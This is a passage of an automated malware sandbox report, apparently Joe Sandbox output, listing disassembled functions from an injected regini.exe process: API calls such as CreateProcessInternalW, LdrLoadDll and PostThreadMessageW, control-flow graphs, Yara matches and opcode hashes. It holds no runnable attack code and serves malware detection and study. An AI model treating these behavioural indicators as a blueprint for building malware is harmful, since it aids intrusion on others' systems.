                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8ab6efd87aeabddf8ba6549ac37cbf807273ab8506414d57bb54d564774464de
                                                                                                              • Instruction ID: e31724aa89370f5ec178aa8d6caabf33122de3d8fc4692c4b6112b8df3dd89ea
                                                                                                              • Opcode Fuzzy Hash: 8ab6efd87aeabddf8ba6549ac37cbf807273ab8506414d57bb54d564774464de
                                                                                                              • Instruction Fuzzy Hash: 4190026134540542D60171594414F070005C7E1301F65C019E106C774D861ACD527126
                                                                                                              Function 02DB2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: d37403e808d8334f0f365f346d4e4cba58f7eb164cd5c92a6172bb5eb0a8d574
                                                                                                              • Instruction ID: 92e357aff0fb759145fa2ae472ba76d0f49c17b25c3250af0130b1c7d149a973
                                                                                                              • Opcode Fuzzy Hash: d37403e808d8334f0f365f346d4e4cba58f7eb164cd5c92a6172bb5eb0a8d574
                                                                                                              • Instruction Fuzzy Hash: 1C90023120540502D60175995408A47000587E0301F65D015A502C775EC6668D917131
                                                                                                              Function 02DB2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2c5f88bd1613dcea5d743d50fdd030e3a5562715f86ed6d76ff527cea1caac71
                                                                                                              • Instruction ID: 2201b55b5dc446577779a53e3c29529a89055b781f2b8675dafa0114b0ab3588
                                                                                                              • Opcode Fuzzy Hash: 2c5f88bd1613dcea5d743d50fdd030e3a5562715f86ed6d76ff527cea1caac71
                                                                                                              • Instruction Fuzzy Hash: 8690023120548902D61171598404B4B000587D0301F69C415A442C778D86968D917121
                                                                                                              Function 02DB2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 63c0385fc2e325314264bfd24340c572c4785793366d0e87301f6dfc07a1e302
                                                                                                              • Instruction ID: 52c25b1210c3f989b3e86a8f9445bdf027f608b8f01902210b95e8bad9dd3970
                                                                                                              • Opcode Fuzzy Hash: 63c0385fc2e325314264bfd24340c572c4785793366d0e87301f6dfc07a1e302
                                                                                                              • Instruction Fuzzy Hash: 1690023120540942D60171594404F47000587E0301F65C01AA012C774D8616CD517521
                                                                                                              Function 02DB2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 016fe8f301f645f077be96b6922fb1dc4938847982b237a05f26e6b0f6b76417
                                                                                                              • Instruction ID: c5cd1b794bd7c10e573a6a9d17368cfb09a858349fd63a00c817c15cd50c31b3
                                                                                                              • Opcode Fuzzy Hash: 016fe8f301f645f077be96b6922fb1dc4938847982b237a05f26e6b0f6b76417
                                                                                                              • Instruction Fuzzy Hash: 4D900221246442525A46B1594404907400697E02417A5C016A141CB70C85279D56E621
                                                                                                              Function 02DB2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 0c0ce6e586f76ff05c013c08e1819b243ef1cbc645bed8bb89f393fb751614fc
                                                                                                              • Instruction ID: 0adc8368fc2c5423924803c49ed29fbf967981449dade7367c9a97926c91c0ea
                                                                                                              • Opcode Fuzzy Hash: 0c0ce6e586f76ff05c013c08e1819b243ef1cbc645bed8bb89f393fb751614fc
                                                                                                              • Instruction Fuzzy Hash: 6E90023120540513D61271594504B07000987D0241FA5C416A042C778D96578E52B121
                                                                                                              Function 02DB2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2ac3e2d8a459095f36d886692d5f2958518bc47a46fdfd7180654985e65b9e5b
                                                                                                              • Instruction ID: 0e236aa776d6c721add0c2dcf999fa85db210998c860baa00c136f647343eb3a
                                                                                                              • Opcode Fuzzy Hash: 2ac3e2d8a459095f36d886692d5f2958518bc47a46fdfd7180654985e65b9e5b
                                                                                                              • Instruction Fuzzy Hash: 3590022921740102D68171595408A0B000587D1202FA5D419A001D778CC9168D696321
                                                                                                              Function 02DB2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: d55f990469be61f57129806a8f470a751fa70b0d44e7127c8cfc1460a64b035b
                                                                                                              • Instruction ID: 541b8471501b2996ca5ad8d11203fd218d40facfd89b4ac521544e35e60feee3
                                                                                                              • Opcode Fuzzy Hash: d55f990469be61f57129806a8f470a751fa70b0d44e7127c8cfc1460a64b035b
                                                                                                              • Instruction Fuzzy Hash: FB90022130540103D64171595418A074005D7E1301F65D015E041C774CD9168D566222
                                                                                                              Function 02DB35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: cdcbb85a5760b262856cc425d51ba9fde4341034be848a279c98e8bb3d6ec342
                                                                                                              • Instruction ID: f3fc1ee3db002859638476f42366b275dc1c784c0d84cb2e5f04cdc34c48f2f2
                                                                                                              • Opcode Fuzzy Hash: cdcbb85a5760b262856cc425d51ba9fde4341034be848a279c98e8bb3d6ec342
                                                                                                              • Instruction Fuzzy Hash: E490023160950502D60171594514B07100587D0201F75C415A042C778D87968E5175A2
                                                                                                              Function 02DB39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 0defba690f09b9dd4c363c6d17187c30beeeb748ada34457e06e552c4e35d263
                                                                                                              • Instruction ID: c7a1b97e34968cb607486bd6b8f84839d2e9b6bbfa596e265e3d07eb7415c8a1
                                                                                                              • Opcode Fuzzy Hash: 0defba690f09b9dd4c363c6d17187c30beeeb748ada34457e06e552c4e35d263
                                                                                                              • Instruction Fuzzy Hash: AA90022124945202D651715D4404A174005A7E0201F65C025A081C7B4D85568D557221
                                                                                                              Function 004B0C49 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 416 4b0c49-4b0c5a 417 4b0c8c-4b0c91 416->417 418 4b0c5c-4b0c7b 416->418 421 4b0c9d-4b0ca7 417->421 422 4b0c93-4b0c9b 417->422 419 4b0ccf-4b0cd5 call 4cb620 418->419 420 4b0c7d-4b0c8b 418->420 427 4b0cda-4b0d2a call 4cc030 call 4b4470 call 4a1470 call 4c1bb0 419->427 420->417 426 4b0c45 420->426 423 4b0ca9-4b0cb1 421->423 424 4b0ccd-4b0cd2 421->424 422->421 424->427 428 4b0cd5 call 4cb620 424->428 426->416 437 4b0d4a-4b0d50 427->437 438 4b0d2c-4b0d3b PostThreadMessageW 427->438 428->427 438->437 439 4b0d3d-4b0d47 438->439 439->437
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004B0D37
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 7-6E2al6$7-6E2al6
                                                                                                              • API String ID: 1836367815-2814820216
                                                                                                              • Opcode ID: bc40e334072402bc1d89a97a9ea4a7ddf0aa54bfd79684bbd7f6d7013af34c0d
                                                                                                              • Instruction ID: cfb261a16c0dbe9f9ff168f59c08b3dcdb3a7d5dba15ce006cc6d2b6de8534be
                                                                                                              • Opcode Fuzzy Hash: bc40e334072402bc1d89a97a9ea4a7ddf0aa54bfd79684bbd7f6d7013af34c0d
                                                                                                              • Instruction Fuzzy Hash: 53219B72A011457AD720AB69CC41EEFBB3CEF41359F14815EF958A7241E72D5D0347E8
                                                                                                              Function 004B0C09 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 440 4b0c09-4b0c3a 441 4b0c9f-4b0ca7 440->441 442 4b0c3c-4b0c44 440->442 443 4b0ca9-4b0cb1 441->443 444 4b0ccd-4b0cd2 441->444 442->441 445 4b0cda-4b0d2a call 4cc030 call 4b4470 call 4a1470 call 4c1bb0 444->445 446 4b0cd5 call 4cb620 444->446 455 4b0d4a-4b0d50 445->455 456 4b0d2c-4b0d3b PostThreadMessageW 445->456 446->445 456->455 457 4b0d3d-4b0d47 456->457 457->455
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 7-6E2al6$7-6E2al6
                                                                                                              • API String ID: 0-2814820216
                                                                                                              • Opcode ID: dc16357460874533881cbd7a06b288662392d4f9ca3d74687526a1bde3a769b6
                                                                                                              • Instruction ID: d4ef197c295d63075f5139c9f6599d6516d37e4a08fa6b713633a04310dc8adc
                                                                                                              • Opcode Fuzzy Hash: dc16357460874533881cbd7a06b288662392d4f9ca3d74687526a1bde3a769b6
                                                                                                              • Instruction Fuzzy Hash: 2921DBB2E411087ADB10DAE99C81DEFB7BCEB45355F05815AFA08FB201D6285D034BF5
                                                                                                              Function 004B0CB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 458 4b0cb4-4b0cd2 461 4b0cda-4b0d2a call 4cc030 call 4b4470 call 4a1470 call 4c1bb0 458->461 462 4b0cd5 call 4cb620 458->462 471 4b0d4a-4b0d50 461->471 472 4b0d2c-4b0d3b PostThreadMessageW 461->472 462->461 472->471 473 4b0d3d-4b0d47 472->473 473->471
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004B0D37
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 7-6E2al6$7-6E2al6
                                                                                                              • API String ID: 1836367815-2814820216
                                                                                                              • Opcode ID: 5e106d3f9556ae34b99eaab1acd35d92d457d942aa2f768c5b372d85c2bacb1a
                                                                                                              • Instruction ID: 2e881eedf7ffb5adaa0a3f633a1b7bfbb4316f0bd341ad830408a8b6a3de99c6
                                                                                                              • Opcode Fuzzy Hash: 5e106d3f9556ae34b99eaab1acd35d92d457d942aa2f768c5b372d85c2bacb1a
                                                                                                              • Instruction Fuzzy Hash: E411C671D0115C7EEB10AAE58C82EFF7B7CDF42398F04805AFA54AB241D52D5E0687B5
                                                                                                              Function 004B0CC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 474 4b0cc0-4b0cd2 476 4b0cda-4b0d2a call 4cc030 call 4b4470 call 4a1470 call 4c1bb0 474->476 477 4b0cd5 call 4cb620 474->477 486 4b0d4a-4b0d50 476->486 487 4b0d2c-4b0d3b PostThreadMessageW 476->487 477->476 487->486 488 4b0d3d-4b0d47 487->488 488->486
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004B0D37
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 7-6E2al6$7-6E2al6
                                                                                                              • API String ID: 1836367815-2814820216
                                                                                                              • Opcode ID: ef7ebdd87e8401c4ea6a9a0a7daeeea323af54268cbb7ee34eef79f4bfbf240d
                                                                                                              • Instruction ID: a0804f912daff4a807633673c21d3a3ffa2bf9f2d12844d6e545f2df4dfa17d6
                                                                                                              • Opcode Fuzzy Hash: ef7ebdd87e8401c4ea6a9a0a7daeeea323af54268cbb7ee34eef79f4bfbf240d
                                                                                                              • Instruction Fuzzy Hash: 01019B71D0110C7ADB10ABE58C81EFF7B7CDF41798F058059FA0467141D6285E0687F5
                                                                                                              Function 004C39E0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 004C3ABB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID: RWP($$wininet.dll
                                                                                                              • API String ID: 3472027048-4161513034
                                                                                                              • Opcode ID: 69daae0e6def29a0f238ba1ef6f12029c44f9b1fa5b542eb42cdedfeb593aa4e
                                                                                                              • Instruction ID: fdd0ca2a83a621346b96d63c3dba5bf9df312db7848ecb1c98cc324b9a3ae96f
                                                                                                              • Opcode Fuzzy Hash: 69daae0e6def29a0f238ba1ef6f12029c44f9b1fa5b542eb42cdedfeb593aa4e
                                                                                                              • Instruction Fuzzy Hash: 4731A0B4601605BBC714DF65CC81FEBB7B8AB88704F00851DB61DAB241D778BA50CBA9
                                                                                                              Function 004BF479 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeUninitialize
                                                                                                              • String ID: @J7<
                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                              • Opcode ID: 839fae8ee01a1ac39ae7945d9fd8eb3fc4407651cfaaaf77882b1d8037e3ab1b
                                                                                                              • Instruction ID: a4c4acfbe1600114c5d0b2e05530fb0fdddb050495cfef021e724eb3a8d92fee
                                                                                                              • Opcode Fuzzy Hash: 839fae8ee01a1ac39ae7945d9fd8eb3fc4407651cfaaaf77882b1d8037e3ab1b
                                                                                                              • Instruction Fuzzy Hash: 91313EB5A0060AAFDB10DFD8CC809EFB7B9FF88304F108559E515AB215D775EE058BA4
                                                                                                              Function 004BF480 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeUninitialize
                                                                                                              • String ID: @J7<
                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                              • Opcode ID: 341843893fdd0668a3d9821aaff0f80a209870c8b1d784d58b6e509090e67d52
                                                                                                              • Instruction ID: 668b717c1232e74edda8220d25de6cd61d4ae239d959895cdf6620086d154881
                                                                                                              • Opcode Fuzzy Hash: 341843893fdd0668a3d9821aaff0f80a209870c8b1d784d58b6e509090e67d52
                                                                                                              • Instruction Fuzzy Hash: 43314FB5A0060AAFDB10DFD8CC809EFB7B9FF88304F108559E505AB215D775EE058BA4
                                                                                                              Function 004A9E7A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004A9EC5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID: W
                                                                                                              • API String ID: 2422867632-655174618
                                                                                                              • Opcode ID: 857b56a473aadf6d94a03855f4c62cf5a11c38fb8f6c4b45586dce29d145458e
                                                                                                              • Instruction ID: f4e573dc02f87573420c837b947aea419e9d681f00e6f0d701ee4844921d418a
                                                                                                              • Opcode Fuzzy Hash: 857b56a473aadf6d94a03855f4c62cf5a11c38fb8f6c4b45586dce29d145458e
                                                                                                              • Instruction Fuzzy Hash: 27F09B7724420076E360A29C9C43FDB67984F51755F14005AF74CBB5C1D999B940869D
                                                                                                              Function 004B44F0 Relevance: 1.6, APIs: 1, Instructions: 107libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004B44E2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 0b6af81593f53b888134122441e15da9a80b41db1191adf4905be041ef5e5225
                                                                                                              • Instruction ID: 4b374a5bf5899538cd6cdf5fd049a90dd7534062c410b0e12d5d30561b099972
                                                                                                              • Opcode Fuzzy Hash: 0b6af81593f53b888134122441e15da9a80b41db1191adf4905be041ef5e5225
                                                                                                              • Instruction Fuzzy Hash: 99310A79A402097BDB14DEA8CC42FEB7768EB44308F04459DFD08D7242F935DA15C7A9
                                                                                                              Function 004B4470 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004B44E2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: f830006e6615140e8580b637796e91e8ab5f34b2beb2de568595537b0918178b
                                                                                                              • Instruction ID: b6b3b15f0a7b543bd6de3c2854067cc6ec7de4ea655369fc2fa624f2252fe1a1
                                                                                                              • Opcode Fuzzy Hash: f830006e6615140e8580b637796e91e8ab5f34b2beb2de568595537b0918178b
                                                                                                              • Instruction Fuzzy Hash: 060152B9D0010DABDB10DBE1DC42FDEB3789B54308F004199E90997242F635EB14CB55
                                                                                                              Function 004C98A0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,004B826E,00000010,?,?,?,00000044,?,00000010,004B826E,?,00000000,?), ref: 004C9900
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateInternalProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 2186235152-0
                                                                                                              • Opcode ID: 4cd4280d41d9b0ffbbefb1fd3d98d1d2ca84c7f99bb972688164bbfd40e7bfce
                                                                                                              • Instruction ID: 4799ae41ce386b34c61ca1fc9e62a6ab15dfaac686e23e8c6451c2733d9771f3
                                                                                                              • Opcode Fuzzy Hash: 4cd4280d41d9b0ffbbefb1fd3d98d1d2ca84c7f99bb972688164bbfd40e7bfce
                                                                                                              • Instruction Fuzzy Hash: 9001C4B6200208BBDB44DE99DC81EDB77ADEF8C714F108108FA09A3240D630F8518BA4
                                                                                                              Function 004A9E80 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
